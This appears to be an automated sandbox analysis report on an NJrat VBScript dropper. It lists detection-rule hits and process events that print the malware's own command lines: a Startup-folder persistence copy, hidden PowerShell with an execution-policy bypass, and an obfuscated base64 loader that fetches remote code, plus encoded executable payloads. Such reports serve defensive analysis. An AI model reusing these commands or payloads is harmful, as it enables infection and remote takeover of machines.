?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 22686
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 21980
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 22686
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 22686
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 21980
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 22686

Source: 16.2.powershell.exe.21665e70000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 16.2.powershell.exe.2164dccfa28.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 00000010.00000002.355723069.000002165D9D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000010.00000002.355709733.000002165D9B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000010.00000002.354839665.000002164DEDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000010.00000002.354821380.000002164DEC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 00000010.00000002.357567873.0000021665E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: Process Memory Space: powershell.exe PID: 6844, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5608, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 5608, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFC08450040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 22_2_0316B4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 22_2_0316E3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 22_2_0316C8A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 22_2_03165048

Source: NJratccccassssG2.00.vbs

Initial sample: Strings found which are bigger than 50

Source: NJratccccassssG2.00.vbs	Virustotal: Detection: 29%
Source: NJratccccassssG2.00.vbs	Metadefender: Detection: 14%
Source: NJratccccassssG2.00.vbs	ReversingLabs: Detection: 25%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NJratccccassssG2.00.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 